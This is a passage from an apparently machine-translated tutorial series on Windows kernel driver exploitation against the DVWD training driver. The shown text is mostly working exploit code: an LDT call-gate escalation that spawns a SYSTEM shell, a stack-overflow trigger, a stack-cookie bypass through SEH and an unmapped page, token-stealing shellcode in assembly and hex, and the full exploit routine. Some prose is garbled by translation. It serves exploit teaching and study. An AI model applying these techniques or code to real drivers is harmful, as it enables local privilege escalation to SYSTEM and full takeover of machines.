 // Retrieve the KPROCESS Address == EPROCESS Address
 kprocess = FindCurrentEPROCESS();
 if(!kprocess)
  return FALSE;

 // Address of LDT Descriptor
 // kd> dt nt!_kprocess
 kprocessLDTDesc = (PBYTE)kprocess + LDT_DESC_FROM_KPROCESS;
 printf("[--] kprocessLDTDesc found at: %p\n", kprocessLDTDesc);

 // Create a new LDT entry
 if(!SetLDTEnv())
  return FALSE;

 // Fixup the Gate Payload (replace 0x41414141 by the address of the kernel payload)
 // and put it into executable memory
 RtlCopyMemory(ReturnFromGate + OFFSET_SHELLCODE, &KernelPayload, sizeof(FARPROC));
 ReturnFromGateArea = CreateUspaceExecMapping(1);
 RtlCopyMemory(ReturnFromGateArea, ReturnFromGate, sizeof(ReturnFromGate));

 // Build the Call-Gate(system descriptor), we pass the address of the shellcode
 pGate = CreateUspaceMapping(1);
 PrepareCallGate32(pGate, (PVOID)ReturnFromGateArea);

 // Build the fake LDT Descriptor with a Call-Gate (the one previously created) 
 PrepareLDTDescriptor32(pLDTDesc, (PVOID)pGate);

 printf("[--] LDT Descriptor fake: 0x%llx\n", LDTDescStorage32);

 // Trigger the vulnerability: overwrite the LdtDescriptor field in KPROCESS
 OverwriteGDTEntry(LDTDescStorage32, kprocessLDTDesc);

 // We force a process context switch
 // Indeed, the LDT segment descriptor into the GDT is updated only after a context 
 // switch. So, it's needed before being able to use the Call-Gate
 Sleep(1000);

 // Trigger the call gate via a FAR CALL (see assembly code)
 FarCall();

 return TRUE;
}


// This is where we begin ... ------------------------------------------------
BOOL TriggerOverwrite32_LDTRemappingWay() {

 // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
 if(LoadAndGetKernelBase() == FALSE)
  return FALSE;

 // We exploit the vulnerability with a payload that patches the SID list to get 
 // SYSTEM privilege and then we spawn a shell if it succeeds
 if(LDTDescOverwrite32() == TRUE) {
  if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
   wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
   return FALSE;
  }
 }

 return TRUE;
}
Copy the code

7. w00t ?


The results are as follows:

Again w00t!!!!!

Refer to 0 x02


(1] GDT and LDT in Windows kernel vulnerability exploitation, by Matthew “j00ru” Jurczyk & Gynvael Coldwind, Hispasec (16 January 2010)

(2] Intel Manual Vol. 3A & 3B http://www.intel.com/products/processor/manuals/

(3] Task State Segment (TSS) http://en.wikipedia.org/wiki/Task_State_Segment

(4] Call-Gate, by Ivanlef0u http://www.ivanlef0u.tuxfamily.org/?p=86

0x04 Exploit stack-based Buffer overflow Vulnerability -(bypassing cookies)


In this article, we take advantage of stack-based buffer overflow weaknesses in drivers when we pass large buffers to drivers (with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL). The main thing is that we’ve got the buffer in kernel mode and we can overflow it just like in user mode (kernel mode buffer overflow is the same concept as user mode overflow). As we saw in the first article in this series, using the RtlCopyMemory() function is a bad thing.

First we will understand how to detect weaknesses in the driver and then we will successfully exploit the process

1. Trigger weaknesses


To trigger the vulnerability, I’ve written a little code:

#! c++ /* IOCTL */ #define DEVICEIO_DVWD_STACKOVERFLOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) int main(int argc, char *argv[]) { char junk[512]; HANDLE hDevice; printf("--[ Fuzz IOCTL DEVICEIO_DVWD_STACKOVERFLOW ---------------------------\n");  printf("[~] Building junk data to send to the driver...\n"); memset(junk, 'A', 511); junk[511] = '\0';  printf("[~] Open an handle to the driver DVWD...\n");  hDevice = CreateFile("\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL); printf("\tHandle: %p\n",hDevice); getch(); printf("[~] Send IOCTL DEVICEIO_DVWD_STACKOVERFLOW with junk data...\n");  DeviceIoControl(hDevice, DEVICEIO_DVWD_STACKOVERFLOW, &junk, strlen(junk), NULL, 0, NULL, NULL); CloseHandle(hDevice);  return 0; }Copy the code

The code is straightforward, and it sends only 512-bytes of junk data (in fact, 511 ‘A’ + ‘\0’). This should be enough to overflow the buffer used by the driver, which is only 64 bytes long.) Ok, let’s compile and run the above code, and this is what we get:

BOUM! A great BSOD happened!

Now we attach the Windows VM for testing to the remote kernel debugger, which is actually running in another Windows VM. All the details about the remote debugging environment built with VMware are given in this article (1).

After we run the code again and send the buffer to the driver, the Windows VM freezes.

… At the same time, the remote kernel debugger detected “fatal system error” :

#! bash *** Fatal System Error: Xb497bd51 0 x000000f7 (0, 0 xf786c6ea, 0 x08793915, 0 x00000000) Break instruction exception - code 80000003 (first chance () A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred.Copy the code

To get more information, we type! Analyze -v, and then we get the following result:

#! bash kd> ! analyze -v ******************************************************************************* * * * Bugcheck Analysis * * *  ******************************************************************************* DRIVER_OVERRAN_STACK_BUFFER (f7) A driver has overrun a stack-based buffer. This overrun could potentially allow a malicious user to gain control of this machine. DESCRIPTION A driver overran a stack-based buffer (or local variable) in a way that would have overwritten the function's return address and jumped back to an arbitrary address when the function returned. This is the classic "buffer overrun" hacking attack and the system has been brought down to prevent a malicious user from gaining complete control of it. Do a kb to get a stack backtrace -- the last routine on the stack before the buffer overrun handlers and bugcheck call is the one that overran its local variable(s). Arguments: Arg1: b497bd51, Actual security check cookie from the stack Arg2: f786c6ea, Expected security check cookie Arg3: 08793915, Complement of the expected security check cookie Arg4: 00000000, zero Debugging Details: ------------------ DEFAULT_BUCKET_ID: GS_FALSE_POSITIVE_MISSING_GSFRAME SECURITY_COOKIE: Expected f786c6ea found b497bd51 BUGCHECK_STR: 0xF7 PROCESS_NAME: fuzzIOCTL.EXE CURRENT_IRQL: 0 LAST_CONTROL_TRANSFER: from 80825b5b to 8086cf70 STACK_TEXT: f5d6f770 80825b5b 00000003 b497bd51 00000000 nt! RtlpBreakWithStatusInstruction f5d6f7bc 80826a4f 00000003 000001ff 0012fcdc nt! KiBugCheckDebugBreak+0x19 f5d6fb54 80826de7 000000f7 b497bd51 f786c6ea nt! KeBugCheck2+0x5d1 f5d6fb74 f7858662 000000f7 b497bd51 f786c6ea nt! KeBugCheckEx+0x1b WARNING: Stack unwind information not available. Following frames may be wrong. f5d6fb94 f7858316 f785808c 02503afa 82499078 DVWDDriver! DvwdHandleIoctlStackOverflow+0x5ce f5d6fc10 41414141 41414141 41414141 41414141 DVWDDriver! DvwdHandleIoctlStackOverflow+0x282 f5d6fc14 41414141 41414141 41414141 41414141 0x41414141 f5d6fc18 41414141 41414141 41414141 41414141 0x41414141 [...]  f5d6fd20 41414141 41414141 41414141 41414141 0x41414141 f5d6fd24 41414141 41414141 41414141 41414141 0x41414141 STACK_COMMAND: kb FOLLOWUP_IP: DVWDDriver! DvwdHandleIoctlStackOverflow+5ce f7858662 cc int 3 SYMBOL_STACK_INDEX: 4 SYMBOL_NAME: DVWDDriver! DvwdHandleIoctlStackOverflow+5ce FOLLOWUP_NAME: MachineOwner MODULE_NAME: DVWDDriver IMAGE_NAME: DVWDDriver.sys DEBUG_FLR_IMAGE_TIMESTAMP: 4e08f4d5 FAILURE_BUCKET_ID: 0xF7_MISSING_GSFRAME_DVWDDriver! DvwdHandleIoctlStackOverflow+5ce BUCKET_ID: 0xF7_MISSING_GSFRAME_DVWDDriver! DvwdHandleIoctlStackOverflow+5ceCopy the code

So this is proof that the kernel stack has been overrun. We can see that all of our ‘A’ (0x41) is in the stack dump when we crash the stack. But realize that the important error message is DRIVER_OVERRAN_STACK_BUFFER (f7), which means that stack overflow can be detected directly by the kernel. This error can be identified as using a stack-cookie – also known as stack-canary – mechanism to avoid Stack overflows… The principle is the same as in user mode (use the useful /GS flag in MS Visual Studio’s linker). Typically, a secure cookie (pseudo-random 4-byte value) is placed on the stack (between the value of the EBP and the local variable), so we want to do this and in order to overflow the value stored in the EIP, we have to overflow the value. Of course, at the end of this function, the security cookie value is checked regardless of the original (expected) value. If they do not match, then we will have a fatal error before being triggered.

2. Stack-Canary ?


If we disassemble the vulnerability function, we will see the following:

At the end of the function there is a __SEH_prolog4_GS call: this is a function that is used to:

• Create the exception handle block (EXCEPTION_REGISTRATION_RECORD) corresponding to the __try{}__except{} function written • create stack-canary

At the end of the function, however, we see a call to __SEH_epilog4_GS; This is a function that retrieves the value of the current stack-canary and calls the __security_check_cookie() function. This trailing function is used to compare the expected value of stack-canary with the current value. This expected value (symbol: __security_cookie) will be stored in the.data section. If the values do not match, it will crash the system (BSOD) as it did in the last test.

3. Bypass stack-canary in kernel mode


To bypass stack-canary, the goal is to raise the exception before the cookie is checked (before the __security_check_cookie() function is called). So, the idea is to generate a memory fault exception (due to accessing an unmapped region in user mode, not in kernel mode). To implement this idea, we will use CreateFileMapping() and MapViewOfFileEx()API calls to construct a mapped memory region (anonymous mapping) (read (1)) and fill it with shellCode’s address (written later).

When sending a DEVICEIO_DVWD_STACKOVERFLOW IOCTL, it is important to understand how we pass the user-mode buffer pointer and its size to the driver. The trick is to adjust the buffer pointer in this way (the end of the buffer is placed on the next unmapped page), which is enough to place only the last four bytes of the buffer outside the anonymous mapping range. The book by the author of DVWDDriver illustrates this point quite well with this picture:

By doing this, when the driver wants to read buffer (for replication), it terminates attempting to read an area of memory that is not mapped in the user state. So an exception will be raised, and in kernel mode it will be possible to bypass stack-canary using SEH.

4. Shellcoding


For my tests, I decided not to use the same Shellcode given in DVWDExploit. In addition to changing the SID patch to exploit the process’s access token, I would like to use another method: steal the SID == NT AUTHORITY\SYSTEM SID access token and overwrite the exploiting process’s access token with the stolen SID I didn’t rebuild the wheel for shellcode, I just took two nice shellcode references from papers(2] and (3). The algorithm is as follows:

  1. The _KTHREAD structure corresponding to the current thread is found in _KPRCB.
  2. Find the _EPROCESS structure corresponding to the current process in _KTHREAD,
  3. Find the process with PID=4 in _EPROCESS (uniqueProcessId=4); System SID== NT AUTHORITY\ System SID
  4. Retrieves the token address for that process
  5. Find _EPROCESS for the process we want to lift weights.
  6. Replace the process Token with the “System” process Token.
  7. Use the SYSEXIT directive to return to user mode. Before calling SYSEXIT, adjust the registers as explained in (2). In order to jump directly to payload in the user state that’s going to run with full privilege.

First, find the kernel structure offset in Windows Server 2003 SP2. And to do that, we’re going to use KD to drill down into those structures

#! c++ kd> r eax=00000001 ebx=000063a3 ecx=80896d4c edx=000002f8 esi=00000000 edi=ed8fcfa8 eip=8086cf70 esp=80894560 ebp=80894570 iopl=0 nv up ei pl nz na po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202 kd> dg @fs P Si  Gr Pr Lo Sel Base Limit Type l ze an es ng Flags ---- -------- -------- ---------- - -- -- -- -- -------- 0030 ffdff000  00001fff Data RW 0 Bg Pg P Nl 00000c92 kd> dt nt! _kpcr ffdff000 [...]  +0x120 PrcbData : _KPRCB kd> dt nt! _kprcb ffdff000+0x120 +0x000 MinorVersion : 1 +0x002 MajorVersion : 1 +0x004 CurrentThread : 0x80896e40 _KTHREAD +0x008 NextThread : (null) +0x00c IdleThread : 0x80896e40 _KTHREAD [...]  kd> dt nt! _kthread 0x80896e40 +0x000 Header : _DISPATCHER_HEADER +0x010 MutantListHead : _LIST_ENTRY [ 0x80896e50 - 0x80896e50 ] +0x018 InitialStack : 0x808948b0 Void +0x01c StackLimit : 0x808918b0 Void +0x020 KernelStack : 0x808945fc Void +0x024 ThreadLock : 0 +0x028 ApcState : _KAPC_STATE +0x028 ApcStateFill : [23] "hn???" +0x03f ApcQueueable : 0x1 '' [...]  kd> dt nt! _kapc_state 0x80896e40+0x28 +0x000 ApcListHead : [2] _LIST_ENTRY [ 0x80896e68 - 0x80896e68 ] +0x010 Process : 0x808970c0 _KPROCESS +0x014 KernelApcInProgress : 0 '' +0x015 KernelApcPending : 0 '' +0x016 UserApcPending : 0 '' kd> dt nt! _eprocess 0x808970c0 +0x000 Pcb : _KPROCESS +0x078 ProcessLock : _EX_PUSH_LOCK +0x080 CreateTime : _LARGE_INTEGER 0x0 +0x088 ExitTime : _LARGE_INTEGER 0x0 +0x090 RundownProtect : _EX_RUNDOWN_REF +0x094 UniqueProcessId : (null) +0x098 ActiveProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ] +0x0a0 QuotaUsage : [3] 0 +0x0ac QuotaPeak : [3] 0 +0x0b8 CommitCharge : 0 +0x0bc PeakVirtualSize : 0 +0x0c0 VirtualSize : 0 +0x0c4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ] +0x0cc DebugPort : (null) +0x0d0 ExceptionPort : (null) +0x0d4 ObjectTable : 0xe1000c60 _HANDLE_TABLE +0x0d8 Token : _EX_FAST_REF +0x0dc WorkingSetPage : 0x17f40 [...]  kd> dt nt! _list_entry +0x000 Flink : Ptr32 _LIST_ENTRY +0x004 Blink : Ptr32 _LIST_ENTRY kd> dt nt! _token -r1 @@(0xe1001727 & ~7) +0x000 TokenSource : _TOKEN_SOURCE +0x000 SourceName : [8] "*SYSTEM*" +0x008 SourceIdentifier : _LUID +0x010 TokenId : _LUID +0x000 LowPart : 0x3ea +0x004 HighPart : 0n0 +0x018 AuthenticationId : _LUID +0x000 LowPart : 0x3e7 +0x004 HighPart : 0n0 +0x020 ParentTokenId : _LUID +0x000 LowPart : 0 +0x004 HighPart : 0n0 +0x028 ExpirationTime : _LARGE_INTEGER 0x6207526`b64ceb90 +0x000 LowPart : 0xb64ceb90 +0x004 HighPart : 0n102790438 +0x000 u : __unnamed +0x000 QuadPart : 0n441481572610010000 [...]Copy the code

From this: we can deduce offset (help you write shellcode on Windows Server 2003 SP2)

• _KTHREAD: located at fs:[0x124] (where the FS segment descriptor points to _KPCR) • _EPROCESS: starting from _KTHREAD to 0x38 • A double-linked list that links all _EPROCESS structures (in all processes). Is positioned from _EPROCESS to 0x98 offset. In the double linked list, which also corresponds to the next element (Flink) pointer. • _EPROCESS. UniqueProcessId: it is a process of PID. Starting from _EPROCESS at offset 0x94 • _eprocess. Token: This structure contains access tokens. The offset in _EPROCESS is 0xD8. (Must be adjusted with 8)

#! c++ .486 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc includelib \masm32\lib\kernel32.lib assume fs:nothing .code shellcode: ; -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --; Shellcode for Windows Server 2k3 ; -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --; Offsets WIN2K3_KTHREAD_OFFSET equ 124h ; nt! _KPCR.PcrbData.CurrentThread WIN2K3_EPROCESS_OFFSET equ 038h ; nt! _KTHREAD.ApcState.Process WIN2K3_FLINK_OFFSET equ 098h ; nt! _EPROCESS.ActiveProcessLinks.Flink WIN2K3_PID_OFFSET equ 094h ; nt! _EPROCESS.UniqueProcessId WIN2K3_TOKEN_OFFSET equ 0d8h ; nt! _EPROCESS.Token WIN2K3_SYS_PID equ 04h ; PID Process SYSTEM pushad ; save registers mov eax, fs:[WIN2K3_KTHREAD_OFFSET] ; EAX <- current _KTHREAD mov eax, [eax+WIN2K3_EPROCESS_OFFSET] ; EAX <- current _KPROCESS == _EPROCESS push eax mov ebx, WIN2K3_SYS_PID SearchProcessPidSystem: mov eax, [eax+WIN2K3_FLINK_OFFSET] ; EAX <- _EPROCESS.ActiveProcessLinks.Flink sub eax, WIN2K3_FLINK_OFFSET ; EAX <- _EPROCESS of the next process cmp [eax+WIN2K3_PID_OFFSET], ebx ; UniqueProcessId == SYSTEM PID ? jne SearchProcessPidSystem ; if no, retry with the next process... mov edi, [eax+WIN2K3_TOKEN_OFFSET] ; EDI <- Token of process with SYSTEM PID and edi, 0fffffff8h ; Must be aligned by 8 pop eax ; EAX <- current _EPROCESS mov ebx, 41414141h SearchProcessPidToEscalate: mov eax, [eax+WIN2K3_FLINK_OFFSET] ; EAX <- _EPROCESS.ActiveProcessLinks.Flink sub eax, WIN2K3_FLINK_OFFSET ; EAX <- _EPROCESS of the next process cmp [eax+WIN2K3_PID_OFFSET], ebx ; UniqueProcessId == PID of the process ; to escalate ? jne SearchProcessPidToEscalate ; if no, retry with the next process... SwapTokens: mov [eax+WIN2K3_TOKEN_OFFSET], edi ; We replace the token of the process ; to escalate by the token of the process ; with SYSTEM PID PartyIsOver: popad ; restore registers mov edx, 11111111h ; EIP value after SYSEXIT mov ecx, 22222222h ; ESP value after SYSEXIT mov eax, 3Bh ; FS value in userland (points to _TEB) db 8Eh, 0E0h ; mov fs, ax db 0Fh, 35h ; Tools > Load Binary File as Hex SYSEXIT end shellCode 00000200 :60 64 A1 24 01 00 00 8B - 40 38 50 BB 04 00 00 00 00000210 :8B 80 98 00 00 00 2D 98 - 00 00 00 39 98 94 00 00 00000220 :00 75 ED 8B B8 D8 00 00 - 00 83 E7 F8 58 BB 41 41 00000230 :41 41 8B 80 98 00 00 00 - 2D 98 00 00 00 39 98 94 00000240 :00 00 00 75 ED 89 B8 D8 - 00 00 00 61 BA 11 11 11 00000250 :11 B9 22 22 22 22 B8 3B - 00 00 00 8E E0 0F 35 00Copy the code

Of course, before using this shellcode, we need to replace the PID of the process to promote the privilege, and use the EIP and ESP values respectively after SYSEXIT. We will implement this in code before sending buffer.

5. Use methodology


The process is as follows:

  1. Create an executable memory region and place the previous shellcode (for exchanging tokens) into the region.
  2. Similarly, create an executable memory region and put Shellcode (executed after weightlifting) into it.
  3. Update the first shellcode: promote process PID, use EIP after SYSEXIT, use ESP after SYSEXIT.(4) Adopt this method.
  4. Construct an anonymous mapping region for our buffer
  5. Fill this mapping area with the address of the first shellcode
  6. Adjust the buffer pointer in this way (the last 4 bytes are in an unmapped area of memory)
  7. Send the buffer to the driver (using the DEVICEIO_DVWD_STACKOVERFLOW IOCTL).

6. Use code


This is using the main function of the program. Given the previous exploit, it should be fairly straightforward:

#! c++ VOID TriggerOverflow32(VOID) { HANDLE hFile; DWORD dwReturn; UCHAR* map; UCHAR *uBuff = NULL; BOOL ret; ULONG_PTR pShellcode; // Load the Kernel Executive ntoskrnl.exe in userland and get some // symbol's kernel address if(LoadAndGetKernelBase() == FALSE) return; // Put the shellcodes in executable memory mapShellcodeSwapTokens = (UCHAR *)CreateUspaceExecMapping(1); mapShellcodePayload = (UCHAR *)CreateUspaceExecMapping(1); memset(mapShellcodeSwapTokens, '\x00', GlobalInfo.dwAllocationGranularity); memset(mapShellcodePayload, '\x00', GlobalInfo.dwAllocationGranularity); RtlCopyMemory(mapShellcodeSwapTokens, ShellcodeSwapTokens, sizeof(ShellcodeSwapTokens)); RtlCopyMemory(mapShellcodePayload, ShellcodePayload, sizeof(ShellcodePayload)); // Added printf("[~] Update Shellcode with PID of the process... \n"); if(! MajShellcodePid(L"DVWDExploit.exe")) { printf("[!]  An error occured, exitting... \n"); return; } printf("[~] Update Shellcode with EIP to use after SYSEXIT... \n"); if(! MajShellcodeEip()) { printf("[!]  An error occured, exitting... \n"); return; } printf("[~] Update Shellcode with ESP to use after SYSEXIT... \n"); if(! MajShellcodeEsp()) { printf("[!]  An error occured, exitting... \n"); return; } printf("[~] Retrieve the address of the shellcode and build the buffer... \n"); // Create an anonymous map map = (UCHAR *)CreateUspaceMapping(1); // Retrieve the address of the shellcode pShellcode = (ULONG_PTR)mapShellcodeSwapTokens; // We fill the map with the address of our shellcode (the address is repeated) FillMap(map, pShellcode, GlobalInfo.dwAllocationGranularity); // We adjust the pointer to the buffer (size = BUFF_SIZE) in such a way that the // last 4 bytes are in an unmapped memory area uBuff = map + GlobalInfo.dwAllocationGranularity - (BUFF_SIZE-sizeof(ULONG_PTR)); // Now, we send our buffer to the driver and trigger the overflow hFile = CreateFile(_T("\\\\.\\DVWD"), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL); deviceHandle = hFile; if(hFile ! = INVALID_HANDLE_VALUE) ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STACKOVERFLOW, uBuff, BUFF_SIZE, NULL, 0, &dwReturn, NULL); // If you get here the vulnerability has not been triggered ... printf("[!]  Stack overflow has not been triggered, maybe the driver has not been loaded ? \n"); return; }Copy the code

7. Everything on your machine belongs to us


To test, I’ve placed the payload taken from Metasploit (with calculator calc.exe shellcode). But we can do anything else…

Our calc.exe has NT AUTHORITY\SYSTEM privileges, so this means that permissions were successfully promoted and payload was successfully executed

reference

(1] CreateFileMapping() function http://msdn.microsoft.com/en-us/library/aa366537(v=vs.85).aspx

(2] MapViewOfFileEx() function http://msdn.microsoft.com/en-us/library/aa366763(v=VS.85).aspx

(3] Remote Debugging using VMWare http://www.catch22.net/tuts/vmware

(4] Local Stack Overflow in Windows Kernel, by Heurs http://www.ghostsinthestack.org/article-29-local-stack-overflow-in-windows-kernel.html

(5] Exploiting Windows Device Drivers, by Piotr Bania http://pb.specialised.info/all/articles/ewdd.pdf